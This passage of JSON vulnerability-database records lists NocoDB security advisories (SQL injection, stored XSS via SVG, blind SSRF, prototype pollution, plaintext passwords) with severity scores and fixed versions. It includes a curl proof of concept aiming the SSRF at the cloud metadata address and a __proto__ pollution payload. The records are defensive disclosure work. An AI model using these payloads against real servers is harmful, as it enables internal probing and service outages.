Mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28401","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02553","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28401"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:51:53Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wwp2-x4rj-j8rm","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"g
eneric_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:51:53Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wwp2-x4rj-j8rm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28401","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28401"},{"reference_url":"https://github.com/advisories/GHSA-wwp2-x4rj-j8rm","reference_id":"GHSA-wwp2-x4rj-j8rm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wwp2-x4rj-j8rm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28401","GHSA-wwp2-x4rj-j8rm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fvtg-v6h6-r7cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21352?format=json","vulnerability_id":"VCID-g231-kqp3-63b5","summary":"NocoDB Vulnerable to SQL Injection via DATEADD Formula\n### Summary\nAn authenticated user with Creator role can inject arbitrary SQL via the DATEADD formula's unit parameter.\n\n### 
Details\nThe third argument (unit) of `DATEADD` was interpolated directly into `knex.raw()` queries after only stripping quote characters. Validation in `formulas.ts` only checked `Literal` AST node types — non-Literal types bypassed validation entirely. Affected MySQL, PostgreSQL, and SQLite function mappings.\n\n### Impact\nSQL injection allowing data exfiltration or modification, scoped to the connected database.\n\n### Credit\nThis issue was reported by [@q1uf3ng](https://github.com/q1uf3ng).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28399","reference_id":"","reference_type":"","scores":[{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22308","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28399"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-03T15:53:44Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-45rp-9p97-h852","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA
:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-03T15:53:44Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-45rp-9p97-h852"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28399","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28399"},{"reference_url":"https://github.com/advisories/GHSA-45rp-9p97-h852","reference_id":"GHSA-45rp-9p97-h852","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-45rp-9p97-h852"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28399","GHSA-45rp-9p97-h852"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g231-kqp3-63b5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52722?format=json","vulnerability_id":"VCID-g4yf-skds-f3e8","summary":"Improper Privilege Management in NocoDB\nImproper Privilege Management in GitHub repository nocodb/nocodb prior to 
0.91.8.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2063","reference_id":"","reference_type":"","scores":[{"value":"0.01073","scoring_system":"epss","scoring_elements":"0.7806","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2063"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/269a19c2ad89a0e8a7596498e3806ff2ec1040c2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/269a19c2ad89a0e8a7596498e3806ff2ec1040c2"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2262","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2262"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2337","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2337"},{"reference_url":"https://huntr.dev/bounties/156f405b-21d6-4384-9bff-17ebfe484e20","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}
,{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/156f405b-21d6-4384-9bff-17ebfe484e20"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2063","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2063"},{"reference_url":"https://github.com/advisories/GHSA-fq4h-m3c8-8m2v","reference_id":"GHSA-fq4h-m3c8-8m2v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fq4h-m3c8-8m2v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/89143?format=json","purl":"pkg:npm/nocodb@0.91.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ctkq-rnus-b7au"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.8"}],"aliases":["CVE-2022-2063","GHSA-fq4h-m3c8-8m2v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"
http://public2.vulnerablecode.io/vulnerabilities/VCID-g4yf-skds-f3e8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18557?format=json","vulnerability_id":"VCID-ht9j-4wpu-1fdc","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting via SVG upload\n## Summary\n\nA **stored Cross-site Scripting (XSS)** vulnerability exists in NocoDB’s attachment handling mechanism. Authenticated users can upload malicious SVG files containing embedded JavaScript, which are later rendered inline and executed in the browsers of other users who view the attachment.\n\nBecause the malicious payload is stored server-side and executed under the application’s origin, successful exploitation can lead to account compromise, data exfiltration and unauthorized actions performed on behalf of affected users.\n\n---\n\n## Vulnerability Details\n\nNocoDB allows file attachments to be previewed inline based on their MIME type. Due to overly permissive MIME type checks and a lack of content sanitization, SVG files containing executable JavaScript are incorrectly treated as safe image content and rendered directly in the browser.\n\n### Root Cause\n\nThe vulnerability results from a combination of **overly permissive MIME type classification** and **unsafe file serving behavior**.\n\n#### 1. Permissive MIME Type Check\n\nIn `attachmentHelpers.ts`, files are considered previewable if their MIME type contains certain substrings:\n\n```ts\nconst previewableMimeTypes = ['image', 'pdf', 'video', 'audio'];\n\nexport const isPreviewAllowed = (args: { mimetype?: string } = {}) => {\n  const { mimetype } = args;\n  if (!mimetype) return false;\n  return previewableMimeTypes.some((type) => mimetype.includes(type));\n};\n```\n\nThis substring-based check (`includes`) causes files with the MIME type `image/svg+xml` to be classified as safe for inline preview. 
However, SVG is an XML-based format that supports executable JavaScript via `<script>` elements, event handlers, and external references.\n\nNo additional validation or sanitization is performed on SVG content after this classification.\n\n#### 2. Unsafe Inline File Serving\n\nUploaded attachments are served by the `fileReadv3` endpoint in `attachments.controller.ts` without sanitization or content-type enforcement:\n\n```ts\n@Get('/dltemp/:param(*)')\nasync fileReadv3(@Param('param') param: string, @Res() res: Response) {\n  // No authentication guard\n\n  // Sets headers from query parameters\n  res.setHeader('Content-Type', queryParams.contentType);\n  res.setHeader('Content-Disposition', queryParams.contentDisposition);\n\n  // Sends raw file content\n  res.sendFile(file.path);\n}\n```\n\nThe endpoint:\n\n* Preserves the original `Content-Type` (`image/svg+xml`)\n* Uses `Content-Disposition: inline`\n* Sends the raw file contents unmodified\n\nAs a result, browsers render the SVG inline and execute any embedded JavaScript under the NocoDB application’s origin.\n\n---\n\n## Impact\n\nThis is a **stored XSS** vulnerability that can be exploited by authenticated users with permission to upload attachments.\n\nPotential impacts include:\n\n* Account takeover\n* Theft of session cookies or API tokens\n* Unauthorized actions performed on behalf of victims\n* Privilege escalation if higher-privileged users view the malicious attachment\n\n---\n\n## Credit\n\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members @p- (Peter Stöckli) and @m-y-mo (Man Yue 
Mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24769","reference_id":"","reference_type":"","scores":[{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05662","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24769"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-q5c6-h22r-qpwr","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-29T14:00:29Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-q5c6-h22r-qpwr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24769","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24769"},{"reference_url":"https://github.com/advisories/GHSA-q5c6-h22r-qpwr","reference_id":"GHSA-q5c6-h22r-qpwr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q5c6-h22r-qpwr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/5
3048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24769","GHSA-q5c6-h22r-qpwr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ht9j-4wpu-1fdc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18736?format=json","vulnerability_id":"VCID-kf54-9jbn-j3e7","summary":"NocoDB has Blind SSRF via Unvalidated HEAD Request in uploadViaURL Functionality\n## Summary\n\nA **blind Server-Side Request Forgery (SSRF)** vulnerability exists in the `uploadViaURL` functionality due to an unprotected `HEAD` request. While the subsequent file retrieval logic correctly enforces SSRF protections, the initial metadata request executes without validation.\n\nThis allows limited outbound requests to arbitrary URLs before SSRF controls are applied.\n\n---\n\n## Vulnerability Details\n\nThe `uploadViaURL()` function issues an `axios.head()` request to retrieve metadata (content type, content length, and final URL after redirects). 
This request is performed **without SSRF filtering**.\n\nAlthough the actual file download is protected by request filtering, the initial `HEAD` request occurs prior to these checks and can be triggered with an attacker-controlled URL.\n\n### Vulnerable Code\n\n```ts\nif (!url.startsWith('data:')) {\n  response = await axios.head(url, { maxRedirects: 5 });\n  mimeType = response.headers['content-type']?.split(';')[0];\n  size = response.headers['content-length'];\n  finalUrl = response.request.res.responseUrl;\n}\n```\n\n---\n\n## Impact\n\nThe impact of this issue is **limited** due to the following constraints:\n\n* Only `HEAD` requests are affected (no response body is returned)\n* No direct exfiltration of response data occurs\n* The subsequent file-fetching logic enforces SSRF protections\n\nHowever, the vulnerability may still allow:\n\n* **Blind SSRF** via outbound `HEAD` requests\n* **Limited internal service probing** (reachability and response behavior)\n* **Interaction with sensitive internal endpoints** that respond to `HEAD` requests\n\nThis issue does **not** provide arbitrary data access or full internal network compromise on its own.\n\n---\n\n## Severity\n\n**Moderate**\n\nThe vulnerability is limited in scope and impact:\n\n* Only `HEAD` requests are affected\n* No response body or sensitive data is directly returned\n* The actual file download logic enforces SSRF protections\n\nWhile the issue permits blind outbound requests to attacker-controlled URLs, it does not enable direct data exfiltration or full internal network compromise on its own.\n\n---\n\n## Proof of Concept\n\n```bash\ncurl -X POST 'http://localhost:8080/api/v2/storage/upload-by-url' \\\n  -H 'Content-Type: application/json' \\\n  -H 'xc-auth: <token>' \\\n  -d '[{\n    \"url\": \"http://169.254.169.254/latest/meta-data/\",\n    \"fileName\": \"test.txt\"\n  }]'\n```\n\nThis request causes the server to issue an unfiltered `HEAD` request before SSRF protections are 
applied.\n\n---\n\n## Acknowledgements\n\nThis issue was first identified and responsibly disclosed by Faizan Raza of Kolega.dev as part of a security assessment using Kolega.dev Deep Code Scan, including validation and fix recommendations.\n\nNocoDB also acknowledges Neel B for independently reporting the same issue prior to publication.\n\nNocoDB thanks Kolega.dev for their contribution to improving the security posture of the project.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24767","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02749","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24767"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-xr7v-j379-34v9","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-29T16:03:20Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-x
r7v-j379-34v9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24767","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24767"},{"reference_url":"https://github.com/advisories/GHSA-xr7v-j379-34v9","reference_id":"GHSA-xr7v-j379-34v9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xr7v-j379-34v9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/53048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24767","GHSA-xr7v-j379-34v9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kf54-9jbn-j3e7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18760?format=json","vulnerability_id":"VCID-mn3h-sy2t-6fem","summary":"NocoDB has Prototype Pollution in Connection Test Endpoint, Leading to DoS\n### Summary\n\nAn authenticated user with org-level-creator permissions can exploit prototype pollution in the `/api/v2/meta/connection/test` endpoint, causing all database write operations to fail application-wide until server restart.\n\nWhile the pollution technically bypasses 
SUPER_ADMIN authorization checks, no practical privileged actions can be performed because database operations fail immediately after pollution.\n\n### Details\n\nThe `deepMerge()` function in `packages/nocodb/src/utils/dataUtils.ts` does not sanitize the keys `__proto__`, `constructor` and `prototype`:\n\n```typescript\nexport const deepMerge = (target: any, ...sources: any[]) => {\n  // ...\n  Object.keys(source).forEach((key) => {\n    if (isMergeableObject(source[key])) {\n      if (!target[key]) target[key] = Array.isArray(source[key]) ? [] : {};\n      deepMerge(target[key], source[key]);  // Recursively merges __proto__\n    } else {\n      target[key] = source[key];\n    }\n  });\n  // ...\n};\n```\n\nThe `testConnection` endpoint (`packages/nocodb/src/controllers/utils.controller.ts`) passes user-controlled input directly to `deepMerge()`:\n\n```typescript\nconfig = await integration.getConfig();\ndeepMerge(config, body);\n```\n\nWhen an attacker sends `{\"__proto__\": {\"super\": true}}`, the `super` property is written to `Object.prototype`, affecting all plain objects in the Node.js process.\n\n## Impact\n\nPollutes Object.prototype globally, breaking all subsequent database write operations for all users until process 
restart.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24766","reference_id":"","reference_type":"","scores":[{"value":"0.00172","scoring_system":"epss","scoring_elements":"0.38374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24766"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.0","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.0"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-95ff-46g6-6gw9","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-29T16:03:33Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-95ff-46g6-6gw9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24766","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24766"},{"referenc
e_url":"https://github.com/advisories/GHSA-95ff-46g6-6gw9","reference_id":"GHSA-95ff-46g6-6gw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-95ff-46g6-6gw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/53048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24766","GHSA-95ff-46g6-6gw9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mn3h-sy2t-6fem"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22462?format=json","vulnerability_id":"VCID-n449-xc5n-yuf8","summary":"NocoDB has Plaintext Storage of Shared View Passwords\n### Summary\nShared view passwords were stored in plaintext in the database and compared using direct string equality.\n\n### Details\nThe `password` column in `nc_views` stored unhashed passwords. Verification used `!==` comparison across `public-datas.service.ts`, 